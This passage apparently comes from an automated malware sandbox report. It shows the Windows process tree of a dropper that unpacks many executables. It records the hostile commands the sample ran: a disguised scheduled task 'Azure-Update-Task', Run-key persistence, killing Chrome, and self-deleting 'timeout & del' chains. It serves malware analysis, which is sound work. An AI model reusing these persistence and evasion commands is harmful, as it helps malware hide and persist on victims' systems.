                                                                                                      • C:\Users\Admin\AppData\Local\Temp\3002.exe
                                                                                                        "C:\Users\Admin\AppData\Local\Temp\3002.exe" -a
                                                                                                        9⤵
                                                                                                        • Executes dropped EXE
                                                                                                        PID:908
                                                                                                    • C:\Users\Admin\AppData\Local\Temp\BearVpn 3.exe
                                                                                                      "C:\Users\Admin\AppData\Local\Temp\BearVpn 3.exe"
                                                                                                      8⤵
                                                                                                      • Executes dropped EXE
                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                      PID:4284
                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                C:\Windows\system32\cmd.exe /c Sun05d60bc3b96248e5.exe
                                                                                                5⤵
                                                                                                • Suspicious use of WriteProcessMemory
                                                                                                PID:4000
                                                                                                • C:\Users\Admin\AppData\Local\Temp\7zSCE35FBA4\Sun05d60bc3b96248e5.exe
                                                                                                  Sun05d60bc3b96248e5.exe
                                                                                                  6⤵
                                                                                                  • Executes dropped EXE
                                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                                  PID:3196
                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                    cmd.exe /c taskkill /f /im chrome.exe
                                                                                                    7⤵
                                                                                                      PID:4692
                                                                                                      • C:\Windows\SysWOW64\taskkill.exe
                                                                                                        taskkill /f /im chrome.exe
                                                                                                        8⤵
                                                                                                        • Kills process with taskkill
                                                                                                        PID:4372
                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                  C:\Windows\system32\cmd.exe /c Sun050462125c7d35.exe
                                                                                                  5⤵
                                                                                                  • Suspicious use of WriteProcessMemory
                                                                                                  PID:3628
                                                                                                  • C:\Users\Admin\AppData\Local\Temp\7zSCE35FBA4\Sun050462125c7d35.exe
                                                                                                    Sun050462125c7d35.exe
                                                                                                    6⤵
                                                                                                    • Executes dropped EXE
                                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                                    PID:3768
                                                                                                    • C:\ProgramData\4078089.exe
                                                                                                      "C:\ProgramData\4078089.exe"
                                                                                                      7⤵
                                                                                                      • Executes dropped EXE
                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                      PID:2308
                                                                                                      • C:\Windows\system32\WerFault.exe
                                                                                                        C:\Windows\system32\WerFault.exe -u -p 2308 -s 616
                                                                                                        8⤵
                                                                                                        • Program crash
                                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                                        PID:1328
                                                                                                    • C:\ProgramData\4514517.exe
                                                                                                      "C:\ProgramData\4514517.exe"
                                                                                                      7⤵
                                                                                                      • Executes dropped EXE
                                                                                                      • Adds Run key to start application
                                                                                                      PID:4064
                                                                                                      • C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe
                                                                                                        "C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"
                                                                                                        8⤵
                                                                                                        • Executes dropped EXE
                                                                                                        PID:4508
                                                                                                    • C:\ProgramData\7679190.exe
                                                                                                      "C:\ProgramData\7679190.exe"
                                                                                                      7⤵
                                                                                                      • Executes dropped EXE
                                                                                                      • Suspicious use of SetThreadContext
                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                      PID:4312
                                                                                                      • C:\ProgramData\7679190.exe
                                                                                                        "C:\ProgramData\7679190.exe"
                                                                                                        8⤵
                                                                                                        • Executes dropped EXE
                                                                                                        PID:4880
                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 4312 -s 892
                                                                                                        8⤵
                                                                                                        • Program crash
                                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                                        PID:5084
                                                                                                    • C:\ProgramData\2195400.exe
                                                                                                      "C:\ProgramData\2195400.exe"
                                                                                                      7⤵
                                                                                                      • Executes dropped EXE
                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                      PID:4644
                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                  C:\Windows\system32\cmd.exe /c Sun05899db881f67fb29.exe
                                                                                                  5⤵
                                                                                                  • Suspicious use of WriteProcessMemory
                                                                                                  PID:3800
                                                                                                  • C:\Users\Admin\AppData\Local\Temp\7zSCE35FBA4\Sun05899db881f67fb29.exe
                                                                                                    Sun05899db881f67fb29.exe
                                                                                                    6⤵
                                                                                                    • Executes dropped EXE
                                                                                                    PID:3728
                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                  C:\Windows\system32\cmd.exe /c Sun05fa3b4d2ae56e.exe /mixone
                                                                                                  5⤵
                                                                                                  • Suspicious use of WriteProcessMemory
                                                                                                  PID:504
                                                                                                  • C:\Users\Admin\AppData\Local\Temp\7zSCE35FBA4\Sun05fa3b4d2ae56e.exe
                                                                                                    Sun05fa3b4d2ae56e.exe /mixone
                                                                                                    6⤵
                                                                                                    • Executes dropped EXE
                                                                                                    PID:3884
                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 3884 -s 656
                                                                                                      7⤵
                                                                                                      • Drops file in Windows directory
                                                                                                      • Program crash
                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                      PID:4904
                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 3884 -s 644
                                                                                                      7⤵
                                                                                                      • Program crash
                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                      PID:4576
                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 3884 -s 636
                                                                                                      7⤵
                                                                                                      • Program crash
                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                      PID:3628
                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 3884 -s 628
                                                                                                      7⤵
                                                                                                      • Program crash
                                                                                                      PID:4168
                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 3884 -s 888
                                                                                                      7⤵
                                                                                                      • Program crash
                                                                                                      PID:5136
                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                  C:\Windows\system32\cmd.exe /c Sun054fe19a12cb3.exe
                                                                                                  5⤵
                                                                                                    PID:4060
                                                                                            • C:\Users\Admin\AppData\Local\Temp\D794.exe
                                                                                              C:\Users\Admin\AppData\Local\Temp\D794.exe
                                                                                              2⤵
                                                                                              • Executes dropped EXE
                                                                                              PID:4384
                                                                                            • C:\Users\Admin\AppData\Local\Temp\3219.exe
                                                                                              C:\Users\Admin\AppData\Local\Temp\3219.exe
                                                                                              2⤵
                                                                                                PID:5912
                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                  cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\3219.exe"
                                                                                                  3⤵
                                                                                                    PID:2304
                                                                                                    • C:\Windows\SysWOW64\timeout.exe
                                                                                                      timeout /T 10 /NOBREAK
                                                                                                      4⤵
                                                                                                      • Delays execution with timeout.exe
                                                                                                      PID:1120
                                                                                                  • C:\Users\Admin\AppData\Local\Temp\6pgwbyMucC.exe
                                                                                                    "C:\Users\Admin\AppData\Local\Temp\6pgwbyMucC.exe"
                                                                                                    3⤵
                                                                                                    • Executes dropped EXE
                                                                                                    PID:4992
                                                                                                    • C:\Windows\SysWOW64\schtasks.exe
                                                                                                      /C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Network\sihost.exe"
                                                                                                      4⤵
                                                                                                      • Creates scheduled task(s)
                                                                                                      PID:2844
                                                                                                • C:\Users\Admin\AppData\Local\Temp\72D.exe
                                                                                                  C:\Users\Admin\AppData\Local\Temp\72D.exe
                                                                                                  2⤵
                                                                                                  • Executes dropped EXE
                                                                                                  • Checks BIOS information in registry
                                                                                                  • Checks whether UAC is enabled
                                                                                                  • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                  PID:3760
                                                                                                  • C:\Windows\System32\Conhost.exe
                                                                                                    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                    3⤵
                                                                                                    • Executes dropped EXE
                                                                                                    • Loads dropped DLL
                                                                                                    PID:5912
                                                                                              • c:\windows\system32\svchost.exe
                                                                                                c:\windows\system32\svchost.exe -k netsvcs -s WpnService
                                                                                                1⤵
                                                                                                  PID:2724
                                                                                                • c:\windows\system32\svchost.exe
                                                                                                  c:\windows\system32\svchost.exe -k netsvcs -s Winmgmt
                                                                                                  1⤵
                                                                                                    PID:2700
                                                                                                    • C:\Windows\system32\wbem\WMIADAP.EXE
                                                                                                      wmiadap.exe /F /T /R
                                                                                                      2⤵
                                                                                                        PID:1156
                                                                                                    • c:\windows\system32\svchost.exe
                                                                                                      c:\windows\system32\svchost.exe -k netsvcs -s IKEEXT
                                                                                                      1⤵
                                                                                                        PID:2544
                                                                                                      • c:\windows\system32\svchost.exe
                                                                                                        c:\windows\system32\svchost.exe -k netsvcs -s LanmanServer
                                                                                                        1⤵
                                                                                                          PID:2464
                                                                                                        • c:\windows\system32\svchost.exe
                                                                                                          c:\windows\system32\svchost.exe -k netsvcs -s ShellHWDetection
                                                                                                          1⤵
                                                                                                            PID:1992
                                                                                                          • c:\windows\system32\svchost.exe
                                                                                                            c:\windows\system32\svchost.exe -k netsvcs -s SENS
                                                                                                            1⤵
                                                                                                              PID:1440
                                                                                                            • c:\windows\system32\svchost.exe
                                                                                                              c:\windows\system32\svchost.exe -k netsvcs -s UserManager
                                                                                                              1⤵
                                                                                                                PID:1296
                                                                                                              • c:\windows\system32\svchost.exe
                                                                                                                c:\windows\system32\svchost.exe -k netsvcs -s Themes
                                                                                                                1⤵
                                                                                                                  PID:1224
                                                                                                                • c:\windows\system32\svchost.exe
                                                                                                                  c:\windows\system32\svchost.exe -k netsvcs -s ProfSvc
                                                                                                                  1⤵
                                                                                                                    PID:1108
                                                                                                                  • c:\windows\system32\svchost.exe
                                                                                                                    c:\windows\system32\svchost.exe -k netsvcs -s Schedule
                                                                                                                    1⤵
                                                                                                                    • Drops file in System32 directory
                                                                                                                    PID:1064
                                                                                                                    • C:\Users\Admin\AppData\Roaming\Microsoft\Network\sihost.exe
                                                                                                                      C:\Users\Admin\AppData\Roaming\Microsoft\Network\sihost.exe
                                                                                                                      2⤵
                                                                                                                      • Executes dropped EXE
                                                                                                                      PID:5456
                                                                                                                      • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                        /C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Network\sihost.exe"
                                                                                                                        3⤵
                                                                                                                        • Creates scheduled task(s)
                                                                                                                        PID:5588
                                                                                                                    • C:\Users\Admin\AppData\Roaming\esvdijb
                                                                                                                      C:\Users\Admin\AppData\Roaming\esvdijb
                                                                                                                      2⤵
                                                                                                                      • Executes dropped EXE
                                                                                                                      • Checks SCSI registry key(s)
                                                                                                                      • Suspicious behavior: MapViewOfSection
                                                                                                                      PID:212
                                                                                                                    • C:\Users\Admin\AppData\Roaming\esvdijb
                                                                                                                      C:\Users\Admin\AppData\Roaming\esvdijb
                                                                                                                      2⤵
                                                                                                                      • Executes dropped EXE
                                                                                                                      • Checks SCSI registry key(s)
                                                                                                                      • Suspicious behavior: MapViewOfSection
                                                                                                                      PID:6308
                                                                                                                    • C:\Users\Admin\AppData\Roaming\esvdijb
                                                                                                                      C:\Users\Admin\AppData\Roaming\esvdijb
                                                                                                                      2⤵
                                                                                                                      • Executes dropped EXE
                                                                                                                      • Checks SCSI registry key(s)
                                                                                                                      • Suspicious behavior: MapViewOfSection
                                                                                                                      PID:4752
                                                                                                                  • c:\windows\system32\svchost.exe
                                                                                                                    c:\windows\system32\svchost.exe -k netsvcs -s gpsvc
                                                                                                                    1⤵
                                                                                                                      PID:340
                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\7zSCE35FBA4\Sun054fe19a12cb3.exe
                                                                                                                      Sun054fe19a12cb3.exe
                                                                                                                      1⤵
                                                                                                                      • Executes dropped EXE
                                                                                                                      PID:672
                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\is-KKM6R.tmp\Sun054fe19a12cb3.tmp
                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\is-KKM6R.tmp\Sun054fe19a12cb3.tmp" /SL5="$60038,506086,422400,C:\Users\Admin\AppData\Local\Temp\7zSCE35FBA4\Sun054fe19a12cb3.exe"
                                                                                                                        2⤵
                                                                                                                        • Executes dropped EXE
                                                                                                                        • Loads dropped DLL
                                                                                                                        PID:2184
                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\is-07TI3.tmp\46807GHF____.exe
                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\is-07TI3.tmp\46807GHF____.exe" /S /UID=burnerch2
                                                                                                                          3⤵
                                                                                                                          • Drops file in Drivers directory
                                                                                                                          • Executes dropped EXE
                                                                                                                          • Adds Run key to start application
                                                                                                                          • Drops file in Program Files directory
                                                                                                                          PID:4276
                                                                                                                          • C:\Program Files\Windows Defender Advanced Threat Protection\VRAQFEKBZR\ultramediaburner.exe
                                                                                                                            "C:\Program Files\Windows Defender Advanced Threat Protection\VRAQFEKBZR\ultramediaburner.exe" /VERYSILENT
                                                                                                                            4⤵
                                                                                                                            • Executes dropped EXE
                                                                                                                            PID:6112
                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\is-IG73T.tmp\ultramediaburner.tmp
                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\is-IG73T.tmp\ultramediaburner.tmp" /SL5="$6020A,281924,62464,C:\Program Files\Windows Defender Advanced Threat Protection\VRAQFEKBZR\ultramediaburner.exe" /VERYSILENT
                                                                                                                              5⤵
                                                                                                                              • Executes dropped EXE
                                                                                                                              • Drops file in Program Files directory
                                                                                                                              • Suspicious use of FindShellTrayWindow
                                                                                                                              PID:5248
                                                                                                                              • C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe
                                                                                                                                "C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe" -silent -desktopShortcut -programMenu
                                                                                                                                6⤵
                                                                                                                                • Executes dropped EXE
                                                                                                                                PID:4388
                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\08-775bc-42c-56f95-792774b5aae60\Fubytajaefo.exe
                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\08-775bc-42c-56f95-792774b5aae60\Fubytajaefo.exe"
                                                                                                                            4⤵
                                                                                                                            • Executes dropped EXE
                                                                                                                            • Checks computer location settings
                                                                                                                            PID:5156
                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\0a-ccb11-ca1-6859e-b0909820b395a\Jypebapezhe.exe
                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\0a-ccb11-ca1-6859e-b0909820b395a\Jypebapezhe.exe"
                                                                                                                            4⤵
                                                                                                                            • Executes dropped EXE
                                                                                                                            • Suspicious use of SetThreadContext
                                                                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                                                                            PID:5116
                                                                                                                            • C:\Windows\System32\cmd.exe
                                                                                                                              "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\20s3czmu.caz\GcleanerEU.exe /eufive & exit
                                                                                                                              5⤵
                                                                                                                                PID:3864
                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\20s3czmu.caz\GcleanerEU.exe
                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\20s3czmu.caz\GcleanerEU.exe /eufive
                                                                                                                                  6⤵
                                                                                                                                  • Executes dropped EXE
                                                                                                                                  PID:3584
                                                                                                                              • C:\Windows\System32\cmd.exe
                                                                                                                                "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\xi4dwm4y.s11\installer.exe /qn CAMPAIGN="654" & exit
                                                                                                                                5⤵
                                                                                                                                  PID:6100
                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\xi4dwm4y.s11\installer.exe
                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\xi4dwm4y.s11\installer.exe /qn CAMPAIGN="654"
                                                                                                                                    6⤵
                                                                                                                                    • Executes dropped EXE
                                                                                                                                    • Loads dropped DLL
                                                                                                                                    • Enumerates connected drives
                                                                                                                                    • Modifies system certificate store
                                                                                                                                    • Suspicious use of FindShellTrayWindow
                                                                                                                                    PID:5656
                                                                                                                                    • C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                      "C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\AW Manager\Windows Manager 1.0.0\install\97FDF62\Windows Manager - Postback Y.msi" /qn CAMPAIGN=654 AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\xi4dwm4y.s11\installer.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\xi4dwm4y.s11\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1631217869 /qn CAMPAIGN=""654"" " CAMPAIGN="654"
                                                                                                                                      7⤵
                                                                                                                                        PID:6316
                                                                                                                                  • C:\Windows\System32\cmd.exe
                                                                                                                                    "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\ho43ozwd.ooz\anyname.exe & exit
                                                                                                                                    5⤵
                                                                                                                                      PID:3880
                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\ho43ozwd.ooz\anyname.exe
                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\ho43ozwd.ooz\anyname.exe
                                                                                                                                        6⤵
                                                                                                                                        • Executes dropped EXE
                                                                                                                                        PID:6008
                                                                                                                                    • C:\Windows\System32\cmd.exe
                                                                                                                                      "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\pnb0igz4.ewv\Vidboxinc.exe & exit
                                                                                                                                      5⤵
                                                                                                                                        PID:4528
                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\pnb0igz4.ewv\Vidboxinc.exe
                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\pnb0igz4.ewv\Vidboxinc.exe
                                                                                                                                          6⤵
                                                                                                                                          • Executes dropped EXE
                                                                                                                                          • Loads dropped DLL
                                                                                                                                          • Checks processor information in registry
                                                                                                                                          PID:3064
                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                            "C:\Windows\System32\cmd.exe" /c taskkill /im Vidboxinc.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\pnb0igz4.ewv\Vidboxinc.exe" & del C:\ProgramData\*.dll & exit
                                                                                                                                            7⤵
                                                                                                                                              PID:4784
                                                                                                                                              • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                taskkill /im Vidboxinc.exe /f
                                                                                                                                                8⤵
                                                                                                                                                • Kills process with taskkill
                                                                                                                                                PID:5632
                                                                                                                                              • C:\Windows\SysWOW64\timeout.exe
                                                                                                                                                timeout /t 6
                                                                                                                                                8⤵
                                                                                                                                                • Delays execution with timeout.exe
                                                                                                                                                PID:4436
                                                                                                                                        • C:\Windows\System32\cmd.exe
                                                                                                                                          "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\rhce4chj.zof\gcleaner.exe /mixfive & exit
                                                                                                                                          5⤵
                                                                                                                                            PID:2376
                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\rhce4chj.zof\gcleaner.exe
                                                                                                                                              C:\Users\Admin\AppData\Local\Temp\rhce4chj.zof\gcleaner.exe /mixfive
                                                                                                                                              6⤵
                                                                                                                                              • Executes dropped EXE
                                                                                                                                              PID:6320
                                                                                                                                          • C:\Windows\System32\cmd.exe
                                                                                                                                            "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\elhaqcgr.2if\autosubplayer.exe /S & exit
                                                                                                                                            5⤵
                                                                                                                                            • Suspicious use of SetWindowsHookEx
                                                                                                                                            PID:6292
                                                                                                                                  • \??\c:\windows\system32\svchost.exe
                                                                                                                                    c:\windows\system32\svchost.exe -k netsvcs -s BITS
                                                                                                                                    1⤵
                                                                                                                                    • Drops file in Windows directory
                                                                                                                                    • Modifies data under HKEY_USERS
                                                                                                                                    PID:4476
                                                                                                                                  • C:\Windows\system32\rundll32.exe
                                                                                                                                    rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                    1⤵
                                                                                                                                    • Process spawned unexpected child process
                                                                                                                                    PID:4004
                                                                                                                                    • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                      rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                      2⤵
                                                                                                                                      • Loads dropped DLL
                                                                                                                                      PID:1832
                                                                                                                                  • C:\Windows\system32\rundll32.exe
                                                                                                                                    rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                    1⤵
                                                                                                                                    • Process spawned unexpected child process
                                                                                                                                    PID:1264
                                                                                                                                    • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                      rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                      2⤵
                                                                                                                                      • Loads dropped DLL
                                                                                                                                      PID:5400
                                                                                                                                  • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
                                                                                                                                    "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
                                                                                                                                    1⤵
                                                                                                                                    • Drops file in Windows directory
                                                                                                                                    • Modifies Internet Explorer settings
                                                                                                                                    • Modifies registry class
                                                                                                                                    • Suspicious use of SetWindowsHookEx
                                                                                                                                    PID:3292
                                                                                                                                  • C:\Windows\system32\browser_broker.exe
                                                                                                                                    C:\Windows\system32\browser_broker.exe -Embedding
                                                                                                                                    1⤵
                                                                                                                                    • Modifies Internet Explorer settings
                                                                                                                                    • Suspicious behavior: EnumeratesProcesses
                                                                                                                                    PID:732
                                                                                                                                  • C:\Windows\system32\msiexec.exe
                                                                                                                                    C:\Windows\system32\msiexec.exe /V
                                                                                                                                    1⤵
                                                                                                                                    • Enumerates connected drives
                                                                                                                                    • Drops file in Program Files directory
                                                                                                                                    • Drops file in Windows directory
                                                                                                                                    • Modifies data under HKEY_USERS
                                                                                                                                    • Modifies registry class
                                                                                                                                    PID:6188
                                                                                                                                    • C:\Windows\syswow64\MsiExec.exe
                                                                                                                                      C:\Windows\syswow64\MsiExec.exe -Embedding 0A43C04FD5CC380053C4B86A7E404817 C
                                                                                                                                      2⤵
                                                                                                                                      • Loads dropped DLL
                                                                                                                                      PID:6592
                                                                                                                                    • C:\Windows\syswow64\MsiExec.exe
                                                                                                                                      C:\Windows\syswow64\MsiExec.exe -Embedding 035378D56ADD79479096C0C1E09D95F3
                                                                                                                                      2⤵
                                                                                                                                      • Blocklisted process makes network request
                                                                                                                                      • Loads dropped DLL
                                                                                                                                      PID:6232
                                                                                                                                      • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                        "C:\Windows\SysWOW64\taskkill.exe" /im AdvancedWindowsManager* /f
                                                                                                                                        3⤵
                                                                                                                                        • Kills process with taskkill
                                                                                                                                        PID:2888
                                                                                                                                    • C:\Windows\syswow64\MsiExec.exe
                                                                                                                                      C:\Windows\syswow64\MsiExec.exe -Embedding 36F4BF659A9B2A9F6827813DEBA0CFB7 E Global\MSI0000
                                                                                                                                      2⤵
                                                                                                                                        PID:5780
                                                                                                                                    • C:\Windows\system32\rundll32.exe
                                                                                                                                      rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                      1⤵
                                                                                                                                      • Process spawned unexpected child process
                                                                                                                                      PID:6364
                                                                                                                                      • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                        rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                        2⤵
                                                                                                                                        • Loads dropped DLL
                                                                                                                                        PID:6448
                                                                                                                                    • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                      "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                      1⤵
                                                                                                                                      • Suspicious behavior: MapViewOfSection
                                                                                                                                      • Suspicious use of SetWindowsHookEx
                                                                                                                                      PID:7152
                                                                                                                                    • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                      "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                      1⤵
                                                                                                                                      • Modifies Internet Explorer settings
                                                                                                                                      • Modifies registry class
                                                                                                                                      PID:6688
                                                                                                                                    • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                      "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                      1⤵
                                                                                                                                      • Modifies registry class
                                                                                                                                      PID:6808
                                                                                                                                    • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                      "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                      1⤵
                                                                                                                                        PID:2696
                                                                                                                                      • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                        "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                        1⤵
                                                                                                                                        • Modifies registry class
                                                                                                                                        PID:4408
                                                                                                                                      • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                        "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                        1⤵
                                                                                                                                          PID:5220
                                                                                                                                        • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                          "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                          1⤵
                                                                                                                                          • Modifies registry class
                                                                                                                                          PID:5776
                                                                                                                                        • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                          "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                          1⤵
                                                                                                                                          • Modifies registry class
                                                                                                                                          PID:5148
                                                                                                                                        • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                          "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                          1⤵
                                                                                                                                          • Modifies registry class
                                                                                                                                          PID:4760
                                                                                                                                        • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                          "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                          1⤵
                                                                                                                                          • Modifies registry class
                                                                                                                                          PID:2348
                                                                                                                                        • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                          "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                          1⤵
                                                                                                                                            PID:6600
                                                                                                                                          • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                            "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                            1⤵
                                                                                                                                            • Modifies registry class
                                                                                                                                            PID:6020
